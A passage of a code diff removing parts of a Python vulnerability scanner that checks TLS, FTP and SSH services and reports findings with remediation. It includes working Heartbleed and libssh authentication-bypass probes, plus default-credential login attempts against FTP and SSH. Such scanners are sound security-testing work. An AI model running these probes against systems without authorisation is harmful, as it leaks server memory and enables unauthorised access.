"des", "null", "export")): - findings.append(Finding( - severity=Severity.HIGH, - title=f"Weak TLS cipher: {cipher}", - description=f"Cipher {cipher} is considered cryptographically weak.", - evidence=f"cipher={cipher}", - remediation="Disable weak ciphers (RC4, DES, NULL, EXPORT).", - owasp_id="A02:2021", - cwe_id="CWE-327", - confidence="certain", - )) - return findings - - def _tls_check_certificate(self, target, port, raw): - """Verified TLS pass — detect self-signed, untrusted issuer, hostname mismatch.""" - findings = [] - try: - ctx = ssl.create_default_context() - with socket.create_connection((target, port), timeout=3) as sock: - with ctx.wrap_socket(sock, server_hostname=target) as ssock: - cert = ssock.getpeercert() - subj = dict(x[0] for x in cert.get("subject", ())) - issuer = dict(x[0] for x in cert.get("issuer", ())) - raw["cert_subject"] = subj.get("commonName") - raw["cert_issuer"] = issuer.get("organizationName") or issuer.get("commonName") - raw["cert_not_after"] = cert.get("notAfter") - except ssl.SSLCertVerificationError as e: - err_msg = str(e).lower() - if "self-signed" in err_msg or "self signed" in err_msg: - findings.append(Finding( - severity=Severity.MEDIUM, - title="Self-signed TLS certificate", - description="The server presents a self-signed certificate that browsers will reject.", - evidence=str(e), - remediation="Replace with a certificate from a trusted CA.", - owasp_id="A02:2021", - cwe_id="CWE-295", - confidence="certain", - )) - elif "hostname mismatch" in err_msg: - findings.append(Finding( - severity=Severity.MEDIUM, - title="TLS certificate hostname mismatch", - description=f"Certificate CN/SAN does not match {target}.", - evidence=str(e), - remediation="Ensure the certificate covers the served hostname.", - owasp_id="A02:2021", - cwe_id="CWE-295", - confidence="certain", - )) - else: - findings.append(Finding( - severity=Severity.MEDIUM, - title="TLS certificate validation failed", - description="Certificate chain could not be verified.", - evidence=str(e), - remediation="Use a certificate from a trusted CA with a valid chain.", - owasp_id="A02:2021", - cwe_id="CWE-295", - confidence="firm", - )) - except Exception: - pass # Non-cert errors (connection reset, etc.) — skip - return findings - - def _tls_check_expiry(self, raw): - """Check certificate expiry from raw dict.""" - findings = [] - expires = raw.get("cert_not_after") - if not expires: - return findings - try: - exp = datetime.strptime(expires, "%b %d %H:%M:%S %Y %Z") - days = (exp - datetime.utcnow()).days - raw["cert_days_remaining"] = days - if days < 0: - findings.append(Finding( - severity=Severity.HIGH, - title=f"TLS certificate expired ({-days} days ago)", - description="The certificate has already expired.", - evidence=f"notAfter={expires}", - remediation="Renew the certificate immediately.", - owasp_id="A02:2021", - cwe_id="CWE-298", - confidence="certain", - )) - elif days <= 30: - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"TLS certificate expiring soon ({days} days)", - description=f"Certificate expires in {days} days.", - evidence=f"notAfter={expires}", - remediation="Renew the certificate before expiry.", - owasp_id="A02:2021", - cwe_id="CWE-298", - confidence="certain", - )) - except Exception: - pass - return findings - - def _tls_check_default_cn(self, raw): - """Flag placeholder common names.""" - findings = [] - cn = raw.get("cert_subject") - if not cn: - return findings - cn_lower = cn.lower() - placeholders = ("example.com", "localhost", "internet widgits", "test", "changeme", "my company", "acme", "default") - if any(p in cn_lower for p in placeholders) or len(cn.strip()) <= 1: - findings.append(Finding( - severity=Severity.LOW, - title=f"TLS certificate placeholder CN: {cn}", - description="Certificate uses a default/placeholder common name.", - evidence=f"CN={cn}", - remediation="Replace with a certificate bearing the correct hostname.", - owasp_id="A02:2021", - cwe_id="CWE-295", - confidence="firm", - )) - return findings - - def _tls_parse_san_from_der(self, cert_der): - """Parse SAN DNS names and IP addresses from a DER-encoded certificate.""" - dns_names, ip_addresses = [], [] - if not cert_der: - return dns_names, ip_addresses - try: - from cryptography import x509 - cert = x509.load_der_x509_certificate(cert_der) - try: - san_ext = cert.extensions.get_extension_for_class(x509.SubjectAlternativeName) - dns_names = san_ext.value.get_values_for_type(x509.DNSName) - ip_addresses = [str(ip) for ip in san_ext.value.get_values_for_type(x509.IPAddress)] - except x509.ExtensionNotFound: - pass - except Exception: - pass - return dns_names, ip_addresses - - def _tls_check_signature_algorithm(self, cert_der): - """Flag SHA-1 or MD5 signature algorithms.""" - findings = [] - if not cert_der: - return findings - try: - from cryptography import x509 - from cryptography.hazmat.primitives import hashes - cert = x509.load_der_x509_certificate(cert_der) - algo = cert.signature_hash_algorithm - if algo and isinstance(algo, (hashes.SHA1, hashes.MD5)): - algo_name = algo.name.upper() - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"TLS certificate signed with weak algorithm: {algo_name}", - description=f"The certificate uses {algo_name} for its signature, which is cryptographically weak.", - evidence=f"signature_algorithm={algo_name}", - remediation="Replace with a certificate using SHA-256 or stronger.", - owasp_id="A02:2021", - cwe_id="CWE-327", - confidence="certain", - )) - except Exception: - pass - return findings - - def _tls_check_validity_period(self, cert_der): - """Flag certificates with a total validity span >5 years (CA/Browser Forum violation).""" - findings = [] - if not cert_der: - return findings - try: - from cryptography import x509 - cert = x509.load_der_x509_certificate(cert_der) - span = cert.not_valid_after_utc - cert.not_valid_before_utc - if span.days > 5 * 365: - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"TLS certificate validity span exceeds 5 years ({span.days} days)", - description="Certificates valid for more than 5 years violate CA/Browser Forum baseline requirements.", - evidence=f"not_before={cert.not_valid_before_utc}, not_after={cert.not_valid_after_utc}, span={span.days}d", - remediation="Reissue with a validity period of 398 days or less.", - owasp_id="A02:2021", - cwe_id="CWE-298", - confidence="certain", - )) - except Exception: - pass - return findings - - - def _tls_check_heartbleed(self, target, port): - """Test for Heartbleed (CVE-2014-0160) by sending a malformed TLS heartbeat. - - Builds a raw TLS connection, completes handshake, then sends a heartbeat - request with payload_length > actual payload. If the server responds with - more data than sent, it is leaking memory. - - Returns - ------- - Finding or None - CRITICAL finding if vulnerable, None otherwise. - """ - try: - # Connect and perform TLS handshake via ssl module - ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) - ctx.check_hostname = False - ctx.verify_mode = ssl.CERT_NONE - # Allow older protocols for compatibility with vulnerable servers - ctx.minimum_version = ssl.TLSVersion.MINIMUM_SUPPORTED - - raw_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - raw_sock.settimeout(3) - raw_sock.connect((target, port)) - tls_sock = ctx.wrap_socket(raw_sock, server_hostname=target) - - # Get the negotiated TLS version for the heartbeat record - tls_version = tls_sock.version() - version_map = { - "TLSv1": b"\x03\x01", "TLSv1.1": b"\x03\x02", - "TLSv1.2": b"\x03\x03", "TLSv1.3": b"\x03\x03", - "SSLv3": b"\x03\x00", - } - tls_ver_bytes = version_map.get(tls_version, b"\x03\x01") - - # Build heartbeat request (ContentType=24, HeartbeatMessageType=1=request) - # payload_length is set to 16384 but actual payload is only 1 byte - # This is the essence of the Heartbleed attack: asking for more data than sent - hb_payload = b"\x01" # 1 byte actual payload - hb_msg = ( - b"\x01" # HeartbeatMessageType: request - + b"\x40\x00" # payload_length: 16384 (0x4000) - + hb_payload # actual payload: 1 byte - + b"\x00" * 16 # padding (16 bytes) - ) - - # TLS record: ContentType=24 (Heartbeat), version, length - tls_record = ( - b"\x18" # ContentType: Heartbeat - + tls_ver_bytes # TLS version - + struct.pack(">H", len(hb_msg)) - + hb_msg - ) - - # Send via the underlying raw socket (bypassing ssl module) - # We need to access the raw socket after handshake - # The ssl wrapper doesn't let us send raw records, so use raw_sock. - # After wrap_socket, raw_sock is consumed. Instead, use tls_sock.unwrap() - # to get the raw socket back. - try: - raw_after = tls_sock.unwrap() - raw_after.sendall(tls_record) - raw_after.settimeout(3) - response = raw_after.recv(65536) - raw_after.close() - except (ssl.SSLError, OSError): - # If unwrap fails, try closing and testing with a new raw connection - tls_sock.close() - return self._tls_heartbleed_raw(target, port, tls_ver_bytes) - - if response and len(response) >= 7: - # Check if response is a heartbeat response (ContentType=24) - if response[0] == 24: - resp_len = struct.unpack(">H", response[3:5])[0] - # If server sent back more than we sent (3 bytes of heartbeat msg), - # it leaked memory - if resp_len > len(hb_msg): - return Finding( - severity=Severity.CRITICAL, - title="TLS Heartbleed vulnerability (CVE-2014-0160)", - description=f"Server at {target}:{port} is vulnerable to Heartbleed. " - "An attacker can read up to 64KB of server memory per request, " - "potentially exposing private keys, session tokens, and passwords.", - evidence=f"Heartbeat response size ({resp_len} bytes) > request payload size ({len(hb_msg)} bytes). " - f"Leaked {resp_len - len(hb_msg)} bytes of server memory.", - remediation="Upgrade OpenSSL to 1.0.1g or later and regenerate all private keys and certificates.", - owasp_id="A06:2021", - cwe_id="CWE-126", - confidence="certain", - ) - # TLS Alert (ContentType=21) = not vulnerable (server rejected heartbeat) - elif response[0] == 21: - return None - - except Exception: - pass - return None - - def _tls_heartbleed_raw(self, target, port, tls_ver_bytes): - """Fallback Heartbleed test using a raw TLS ClientHello with heartbeat extension. - - This is needed when ssl.unwrap() fails. We build a minimal TLS 1.0 - ClientHello that advertises the heartbeat extension, complete the handshake, - and then send the malformed heartbeat. - - Returns - ------- - Finding or None - """ - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(5) - sock.connect((target, port)) - - # Minimal TLS 1.0 ClientHello with heartbeat extension - # This is a simplified approach: we use struct to build the exact bytes - hello = bytearray() - # Handshake header: ClientHello (0x01) - # Random: 32 bytes - client_random = random.randbytes(32) - # Session ID: 0 bytes - # Cipher suites: a few common ones - ciphers = ( - b"\x00\x2f" # TLS_RSA_WITH_AES_128_CBC_SHA - b"\x00\x35" # TLS_RSA_WITH_AES_256_CBC_SHA - b"\x00\x0a" # TLS_RSA_WITH_3DES_EDE_CBC_SHA - ) - # Compression: null only - compression = b"\x01\x00" - # Extensions: heartbeat (type 0x000f, length 1, mode=1 peer allowed to send) - heartbeat_ext = struct.pack(">HH", 0x000f, 1) + b"\x01" - extensions = heartbeat_ext - - client_hello_body = ( - b"\x03\x01" # TLS 1.0 - + client_random - + b"\x00" # Session ID length: 0 - + struct.pack(">H", len(ciphers)) + ciphers - + compression - + struct.pack(">H", len(extensions)) + extensions - ) - - # Handshake message: type=1 (ClientHello), length - handshake = b"\x01" + struct.pack(">I", len(client_hello_body))[1:] + client_hello_body - - # TLS record: ContentType=22 (Handshake), version=TLS 1.0 - tls_record = b"\x16\x03\x01" + struct.pack(">H", len(handshake)) + handshake - sock.sendall(tls_record) - - # Read ServerHello + Certificate + ServerHelloDone - # We just need to consume enough to complete the handshake - server_response = b"" - for _ in range(10): - try: - chunk = sock.recv(16384) - if not chunk: - break - server_response += chunk - # Check if we received ServerHelloDone (handshake type 0x0e) - if b"\x0e\x00\x00\x00" in server_response: - break - except (socket.timeout, OSError): - break - - if not server_response: - sock.close() - return None - - # Now send the malformed heartbeat - hb_msg = b"\x01\x40\x00" + b"\x41" + b"\x00" * 16 # type=request, length=16384, 1 byte payload + padding - hb_record = b"\x18\x03\x01" + struct.pack(">H", len(hb_msg)) + hb_msg - sock.sendall(hb_record) - - # Read response - sock.settimeout(3) - try: - response = sock.recv(65536) - except (socket.timeout, OSError): - response = b"" - sock.close() - - if response and len(response) >= 7 and response[0] == 24: - resp_payload_len = struct.unpack(">H", response[3:5])[0] - if resp_payload_len > len(hb_msg): - return Finding( - severity=Severity.CRITICAL, - title="TLS Heartbleed vulnerability (CVE-2014-0160)", - description=f"Server at {target}:{port} is vulnerable to Heartbleed. " - "An attacker can read up to 64KB of server memory per request, " - "potentially exposing private keys, session tokens, and passwords.", - evidence=f"Heartbeat response ({resp_payload_len} bytes) exceeded request size.", - remediation="Upgrade OpenSSL to 1.0.1g or later and regenerate all private keys and certificates.", - owasp_id="A06:2021", - cwe_id="CWE-126", - confidence="certain", - ) - except Exception: - pass - return None - - def _tls_check_downgrade(self, target, port): - """Test for TLS downgrade vulnerabilities (POODLE, BEAST). - - Returns list of findings. - """ - findings = [] - - # --- POODLE: Test SSLv3 acceptance --- - try: - ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) - ctx.check_hostname = False - ctx.verify_mode = ssl.CERT_NONE - ctx.maximum_version = ssl.TLSVersion.SSLv3 - ctx.minimum_version = ssl.TLSVersion.SSLv3 - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - tls_sock = ctx.wrap_socket(sock, server_hostname=target) - negotiated = tls_sock.version() - tls_sock.close() - if negotiated and "SSL" in negotiated: - findings.append(Finding( - severity=Severity.HIGH, - title="Server accepts SSLv3 — vulnerable to POODLE (CVE-2014-3566)", - description=f"TLS on {target}:{port} accepts SSLv3 connections. " - "The POODLE attack allows decrypting SSLv3 traffic using CBC cipher padding oracles.", - evidence=f"Negotiated {negotiated} when SSLv3 was forced.", - remediation="Disable SSLv3 entirely on the server.", - owasp_id="A02:2021", - cwe_id="CWE-757", - confidence="certain", - )) - except (ssl.SSLError, OSError): - pass # SSLv3 rejected or not available in runtime — good - - # --- BEAST: Test TLS 1.0 with CBC cipher --- - try: - ctx = ssl.SSLContext(ssl.PROTOCOL_TLS_CLIENT) - ctx.check_hostname = False - ctx.verify_mode = ssl.CERT_NONE - ctx.maximum_version = ssl.TLSVersion.TLSv1 - ctx.minimum_version = ssl.TLSVersion.TLSv1 - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - tls_sock = ctx.wrap_socket(sock, server_hostname=target) - negotiated = tls_sock.version() - cipher_info = tls_sock.cipher() - tls_sock.close() - if negotiated and cipher_info: - cipher_name = cipher_info[0] if cipher_info else "" - if "CBC" in cipher_name.upper(): - findings.append(Finding( - severity=Severity.MEDIUM, - title="TLS 1.0 with CBC cipher — BEAST risk (CVE-2011-3389)", - description=f"TLS on {target}:{port} accepts TLS 1.0 with CBC-mode cipher '{cipher_name}'. " - "The BEAST attack exploits predictable IVs in TLS 1.0 CBC mode.", - evidence=f"Negotiated {negotiated} with cipher {cipher_name}.", - remediation="Disable TLS 1.0 or ensure only non-CBC ciphers are used with TLS 1.0.", - owasp_id="A02:2021", - cwe_id="CWE-327", - confidence="certain", - )) - except (ssl.SSLError, OSError): - pass # TLS 1.0 rejected — good - - return findings - - def _service_info_ftp(self, target, port): # default port: 21 - """ - Assess FTP service security: banner, anonymous access, default creds, - server fingerprint, TLS support, write access, and credential validation. - - Checks performed (in order): - - 1. Banner grab and SYST/FEAT fingerprint. - 2. Anonymous login attempt. - 3. Write access test (STOR) after anonymous login. - 4. Directory listing and traversal. - 5. TLS support check (AUTH TLS). - 6. Default credential check. - 7. Arbitrary credential acceptance test. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings with banner, vulnerabilities, server_info, etc. - """ - findings = [] - result = { - "banner": None, - "server_type": None, - "features": [], - "anonymous_access": False, - "write_access": False, - "tls_supported": False, - "accepted_credentials": [], - "directory_listing": None, - } - - def _ftp_connect(user=None, passwd=None): - """Open a fresh FTP connection and optionally login.""" - ftp = ftplib.FTP(timeout=5) - ftp.connect(target, port, timeout=5) - if user is not None: - ftp.login(user, passwd or "") - return ftp - - # --- 1. Banner grab --- - try: - ftp = _ftp_connect() - result["banner"] = ftp.getwelcome() - except Exception as e: - return probe_error(target, port, "FTP", e) - - # FTP server version CVE check - _ftp_m = _re.search( - r'(ProFTPD|vsftpd)[/ ]+(\d+(?:\.\d+)+)', - result["banner"], _re.IGNORECASE, - ) - if _ftp_m: - _cve_product = {'proftpd': 'proftpd', 'vsftpd': 'vsftpd'}.get(_ftp_m.group(1).lower()) - if _cve_product: - findings += check_cves(_cve_product, _ftp_m.group(2)) - - # --- 2. Anonymous login --- - try: - resp = ftp.login() - result["anonymous_access"] = True - findings.append(Finding( - severity=Severity.HIGH, - title="FTP allows anonymous login.", - description="The FTP server permits unauthenticated access via anonymous login.", - evidence="Anonymous login succeeded.", - remediation="Disable anonymous FTP access unless explicitly required.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - except Exception: - # Anonymous failed — close and move on to credential tests - try: - ftp.quit() - except Exception: - pass - ftp = None - - # --- 2b. SYST / FEAT (after login — some servers require auth first) --- - if ftp: - try: - syst = ftp.sendcmd("SYST") - result["server_type"] = syst - except Exception: - pass - - try: - feat_resp = ftp.sendcmd("FEAT") - feats = [ - line.strip() for line in feat_resp.split("\n") - if line.strip() and not line.startswith("211") - ] - result["features"] = feats - except Exception: - pass - - # --- 2c. PASV IP leak check --- - if ftp and result["anonymous_access"]: - try: - pasv_resp = ftp.sendcmd("PASV") - _pasv_match = _re.search(r'\((\d+),(\d+),(\d+),(\d+),(\d+),(\d+)\)', pasv_resp) - if _pasv_match: - pasv_ip = f"{_pasv_match.group(1)}.{_pasv_match.group(2)}.{_pasv_match.group(3)}.{_pasv_match.group(4)}" - if pasv_ip != target: - import ipaddress as _ipaddress - try: - if _ipaddress.ip_address(pasv_ip).is_private: - result["pasv_ip"] = pasv_ip - self._emit_metadata("internal_ips", {"ip": pasv_ip, "source": f"ftp_pasv:{port}"}) - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"FTP PASV leaks internal IP: {pasv_ip}", - description=f"PASV response reveals RFC1918 address {pasv_ip}, different from target {target}.", - evidence=f"PASV response: {pasv_resp}", - remediation="Configure FTP passive address masquerading to use the public IP.", - owasp_id="A05:2021", - cwe_id="CWE-200", - confidence="certain", - )) - except (ValueError, TypeError): - pass - except Exception: - pass - - # --- 3. Write access test (only if anonymous login succeeded) --- - if ftp and result["anonymous_access"]: - import io - try: - ftp.set_pasv(True) - test_data = io.BytesIO(b"RedMesh write access probe") - resp = ftp.storbinary("STOR __redmesh_probe.txt", test_data) - if resp and resp.startswith("226"): - result["write_access"] = True - findings.append(Finding( - severity=Severity.CRITICAL, - title="FTP anonymous write access enabled (file upload possible).", - description="Anonymous users can upload files to the FTP server.", - evidence="STOR command succeeded with anonymous session.", - remediation="Remove write permissions for anonymous FTP users.", - owasp_id="A01:2021", - cwe_id="CWE-434", - confidence="certain", - )) - try: - ftp.delete("__redmesh_probe.txt") - except Exception: - pass - except Exception: - pass - - # --- 4. Directory listing and traversal --- - if ftp: - try: - pwd = ftp.pwd() - files = [] - try: - ftp.retrlines("LIST", files.append) - except Exception: - pass - if files: - result["directory_listing"] = files[:20] - except Exception: - pass - - # Check if CWD allows directory traversal - for test_dir in ["/etc", "/var", ".."]: - try: - resp = ftp.cwd(test_dir) - if resp and (resp.startswith("250") or resp.startswith("200")): - findings.append(Finding( - severity=Severity.HIGH, - title=f"FTP directory traversal: CWD to '{test_dir}' succeeded.", - description="The FTP server allows changing to directories outside the intended root.", - evidence=f"CWD '{test_dir}' returned: {resp}", - remediation="Restrict FTP users to their home directory (chroot).", - owasp_id="A01:2021", - cwe_id="CWE-22", - confidence="certain", - )) - break - except Exception: - pass - try: - ftp.cwd("/") - except Exception: - pass - - if ftp: - try: - ftp.quit() - except Exception: - pass - - # --- 5. TLS support check --- - try: - ftp_tls = _ftp_connect() - resp = ftp_tls.sendcmd("AUTH TLS") - if resp.startswith("234"): - result["tls_supported"] = True - try: - ftp_tls.quit() - except Exception: - pass - except Exception: - if not result["tls_supported"]: - findings.append(Finding( - severity=Severity.MEDIUM, - title="FTP does not support TLS encryption (cleartext credentials).", - description="Credentials and data are transmitted in cleartext over the network.", - evidence="AUTH TLS command rejected or not supported.", - remediation="Enable FTPS (AUTH TLS) or migrate to SFTP.", - owasp_id="A02:2021", - cwe_id="CWE-319", - confidence="certain", - )) - - # --- 6. Default credential check --- - for user, passwd in _FTP_DEFAULT_CREDS: - try: - ftp_cred = _ftp_connect(user, passwd) - result["accepted_credentials"].append(f"{user}:{passwd}") - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"FTP default credential accepted: {user}:{passwd}", - description="The FTP server accepted a well-known default credential.", - evidence=f"Accepted credential: {user}:{passwd}", - remediation="Change default passwords and enforce strong credential policies.", - owasp_id="A07:2021", - cwe_id="CWE-798", - confidence="certain", - )) - try: - ftp_cred.quit() - except Exception: - pass - except (ftplib.error_perm, ftplib.error_reply): - pass - except Exception: - pass - - # --- 7. Arbitrary credential acceptance test --- - import string as _string - ruser = "".join(random.choices(_string.ascii_lowercase, k=8)) - rpass = "".join(random.choices(_string.ascii_letters + _string.digits, k=12)) - try: - ftp_rand = _ftp_connect(ruser, rpass) - findings.append(Finding( - severity=Severity.CRITICAL, - title="FTP accepts arbitrary credentials", - description="Random credentials were accepted, indicating a dangerous misconfiguration or deceptive service.", - evidence=f"Accepted random creds {ruser}:{rpass}", - remediation="Investigate immediately — authentication is non-functional.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - try: - ftp_rand.quit() - except Exception: - pass - except (ftplib.error_perm, ftplib.error_reply): - pass - except Exception: - pass - - return probe_result(raw_data=result, findings=findings) - - def _service_info_ssh(self, target, port): # default port: 22 - """ - Assess SSH service security: banner, auth methods, and default credentials. - - Checks performed (in order): - - 1. Banner grab — fingerprint server version. - 2. Auth method enumeration — identify if password auth is enabled. - 3. Default credential check — try a small list of common creds. - 4. Arbitrary credential acceptance test. - - Parameters - ---------- - target : str - Hostname or IP address. - port : int - Port being probed. - - Returns - ------- - dict - Structured findings with banner, auth_methods, and vulnerabilities. - """ - findings = [] - result = { - "banner": None, - "auth_methods": [], - } - - # --- 1. Banner grab (raw socket) --- - try: - sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) - sock.settimeout(3) - sock.connect((target, port)) - banner = sock.recv(1024).decode("utf-8", errors="ignore").strip() - sock.close() - result["banner"] = banner - # Emit OS claim from SSH banner (e.g. "SSH-2.0-OpenSSH_8.9p1 Ubuntu") - _os_match = _re.search(r'(Ubuntu|Debian|Fedora|CentOS|Alpine|FreeBSD)', banner, _re.IGNORECASE) - if _os_match: - self._emit_metadata("os_claims", f"ssh:{port}", _os_match.group(1)) - except Exception as e: - return probe_error(target, port, "SSH", e) - - # --- 2. Auth method enumeration via paramiko Transport --- - try: - transport = paramiko.Transport((target, port)) - transport.connect() - try: - transport.auth_none("") - except paramiko.BadAuthenticationType as e: - result["auth_methods"] = list(e.allowed_types) - except paramiko.AuthenticationException: - result["auth_methods"] = ["unknown"] - finally: - transport.close() - except Exception as e: - self.P(f"SSH auth enumeration failed on {target}:{port}: {e}", color='y') - - if "password" in result["auth_methods"]: - findings.append(Finding( - severity=Severity.MEDIUM, - title="SSH password authentication is enabled (prefer key-based auth).", - description="The SSH server allows password-based login, which is susceptible to brute-force attacks.", - evidence=f"Auth methods: {', '.join(result['auth_methods'])}", - remediation="Disable PasswordAuthentication in sshd_config and use key-based auth.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - - # --- 3. Default credential check --- - accepted_creds = [] - - for username, password in _SSH_DEFAULT_CREDS: - try: - client = paramiko.SSHClient() - client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) - client.connect( - target, port=port, - username=username, password=password, - timeout=3, auth_timeout=3, - look_for_keys=False, allow_agent=False, - ) - accepted_creds.append(f"{username}:{password}") - client.close() - except paramiko.AuthenticationException: - continue - except Exception: - break # connection issue, stop trying - - # --- 4. Arbitrary credential acceptance test --- - random_user = f"probe_{random.randint(10000, 99999)}" - random_pass = f"rnd_{random.randint(10000, 99999)}" - try: - client = paramiko.SSHClient() - client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) - client.connect( - target, port=port, - username=random_user, password=random_pass, - timeout=3, auth_timeout=3, - look_for_keys=False, allow_agent=False, - ) - findings.append(Finding( - severity=Severity.CRITICAL, - title="SSH accepts arbitrary credentials", - description="Random credentials were accepted, indicating a dangerous misconfiguration or deceptive service.", - evidence=f"Accepted random creds {random_user}:{random_pass}", - remediation="Investigate immediately — authentication is non-functional.", - owasp_id="A07:2021", - cwe_id="CWE-287", - confidence="certain", - )) - client.close() - except paramiko.AuthenticationException: - pass - except Exception: - pass - - if accepted_creds: - result["accepted_credentials"] = accepted_creds - for cred in accepted_creds: - findings.append(Finding( - severity=Severity.CRITICAL, - title=f"SSH default credential accepted: {cred}", - description=f"The SSH server accepted a well-known default credential.", - evidence=f"Accepted credential: {cred}", - remediation="Change default passwords immediately and enforce strong credential policies.", - owasp_id="A07:2021", - cwe_id="CWE-798", - confidence="certain", - )) - - # --- 5. Cipher/KEX audit --- - cipher_findings, weak_labels = self._ssh_check_ciphers(target, port) - findings += cipher_findings - result["weak_algorithms"] = weak_labels - - # --- 6. CVE check on banner version --- - if result["banner"]: - ssh_lib, ssh_version = self._ssh_identify_library(result["banner"]) - if ssh_lib and ssh_version: - result["ssh_library"] = ssh_lib - result["ssh_version"] = ssh_version - findings += check_cves(ssh_lib, ssh_version) - - # --- 7. libssh auth bypass (CVE-2018-10933) --- - if ssh_lib == "libssh": - bypass = self._ssh_check_libssh_bypass(target, port) - if bypass: - findings.append(bypass) - - return probe_result(raw_data=result, findings=findings) - - # Patterns: (regex, product_name_for_cve_db) - _SSH_LIBRARY_PATTERNS = [ - (_re.compile(r'OpenSSH[_\s](\d+\.\d+(?:\.\d+)?)', _re.IGNORECASE), "openssh"), - (_re.compile(r'libssh[_\s-](\d+\.\d+(?:\.\d+)?)', _re.IGNORECASE), "libssh"), - (_re.compile(r'dropbear[_\s](\d+(?:\.\d+)*)', _re.IGNORECASE), "dropbear"), - (_re.compile(r'paramiko[_\s](\d+\.\d+(?:\.\d+)?)', _re.IGNORECASE), "paramiko"), - (_re.compile(r'Erlang[/\s](?:OTP[_/\s]*)?(\d+\.\d+(?:\.\d+)*)', _re.IGNORECASE), "erlang_ssh"), - ] - - def _ssh_identify_library(self, banner): - """Identify SSH library and version from banner string. - - Returns - ------- - tuple[str | None, str | None] - (product_name, version) — product_name matches cve_db product keys. - """ - for pattern, product in self._SSH_LIBRARY_PATTERNS: - m = pattern.search(banner) - if m: - return product, m.group(1) - return None, None - - def _ssh_check_ciphers(self, target, port): - """Audit SSH ciphers, KEX, and MACs via paramiko Transport. - - Returns - ------- - tuple[list[Finding], list[str]] - (findings, weak_algorithm_labels) — findings for probe_result, - labels for the raw-data ``weak_algorithms`` field. - """ - findings = [] - weak_labels = [] - _WEAK_CIPHERS = {"3des-cbc", "blowfish-cbc", "arcfour", "arcfour128", "arcfour256", - "aes128-cbc", "aes192-cbc", "aes256-cbc", "cast128-cbc"} - _WEAK_KEX = {"diffie-hellman-group1-sha1", "diffie-hellman-group14-sha1", - "diffie-hellman-group-exchange-sha1"} - - try: - transport = paramiko.Transport((target, port)) - transport.connect() - sec_opts = transport.get_security_options() - - ciphers = set(sec_opts.ciphers) if sec_opts.ciphers else set() - kex = set(sec_opts.kex) if sec_opts.kex else set() - key_types = set(sec_opts.key_types) if sec_opts.key_types else set() - - # RSA key size check — must be done before transport.close() - try: - remote_key = transport.get_remote_server_key() - if remote_key is not None and remote_key.get_name() == "ssh-rsa": - key_bits = remote_key.get_bits() - if key_bits < 2048: - findings.append(Finding( - severity=Severity.HIGH, - title=f"SSH RSA key is critically weak ({key_bits}-bit)", - description=f"The server's RSA host key is only {key_bits}-bit, which is trivially factorable.", - evidence=f"RSA key size: {key_bits} bits", - remediation="Generate a new RSA key of at least 3072 bits, or switch to Ed25519.", - owasp_id="A02:2021", - cwe_id="CWE-326", - confidence="certain", - )) - weak_labels.append(f"rsa_key: {key_bits}-bit") - elif key_bits < 3072: - findings.append(Finding( - severity=Severity.LOW, - title=f"SSH RSA key below NIST recommendation ({key_bits}-bit)", - description=f"The server's RSA host key is {key_bits}-bit. NIST recommends >=3072-bit after 2023.", - evidence=f"RSA key size: {key_bits} bits", - remediation="Generate a new RSA key of at least 3072 bits, or switch to Ed25519.", - owasp_id="A02:2021", - cwe_id="CWE-326", - confidence="certain", - )) - weak_labels.append(f"rsa_key: {key_bits}-bit") - except Exception: - pass - - transport.close() - - # DSA key detection - if "ssh-dss" in key_types: - findings.append(Finding( - severity=Severity.MEDIUM, - title="SSH DSA host key offered (ssh-dss)", - description="The SSH server offers DSA host keys, which are limited to 1024-bit and considered weak.", - evidence=f"Key types: {', '.join(sorted(key_types))}", - remediation="Remove DSA host keys and use Ed25519 or RSA (>=3072-bit) instead.", - owasp_id="A02:2021", - cwe_id="CWE-326", - confidence="certain", - )) - weak_labels.append("key_types: ssh-dss") - - weak_ciphers = ciphers & _WEAK_CIPHERS - weak_kex = kex & _WEAK_KEX - - if weak_ciphers: - cipher_list = ", ".join(sorted(weak_ciphers)) - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"SSH weak ciphers: {cipher_list}", - description="The SSH server offers ciphers considered cryptographically weak.", - evidence=f"Weak ciphers offered: {cipher_list}", - remediation="Disable CBC-mode and RC4 ciphers in sshd_config.", - owasp_id="A02:2021", - cwe_id="CWE-326", - confidence="certain", - )) - weak_labels.append(f"ciphers: {cipher_list}") - - if weak_kex: - kex_list = ", ".join(sorted(weak_kex)) - findings.append(Finding( - severity=Severity.MEDIUM, - title=f"SSH weak key exchange: {kex_list}", - description="The SSH server offers key-exchange algorithms with known weaknesses.", - evidence=f"Weak KEX offered: {kex_list}", - remediation="Disable SHA-1 based key exchange algorithms in sshd_config.", - owasp_id="A02:2021", - cwe_id="CWE-326", - confidence="certain", - )) - weak_labels.append(f"kex: {kex_list}") - - except Exception as e: - self.P(f"SSH cipher audit failed on {target}:{port}: {e}", color='y') - - return findings, weak_labels - - def _ssh_check_libssh_bypass(self, target, port): - """Test CVE-2018-10933: libssh auth bypass via premature USERAUTH_SUCCESS. - - Affected versions: libssh 0.6.0–0.8.3 (fixed in 0.7.6 / 0.8.4). - The vulnerability allows a client to send SSH2_MSG_USERAUTH_SUCCESS (52) - instead of a proper auth request, and the server accepts it. - - Returns - ------- - Finding or None - """ - try: - transport = paramiko.Transport((target, port)) - transport.connect() - # SSH2_MSG_USERAUTH_SUCCESS = 52 (0x34) - msg = paramiko.Message() - msg.add_byte(b'\x34') - transport._send_message(msg) - try: - chan = transport.open_session(timeout=3) - if chan is not None: - 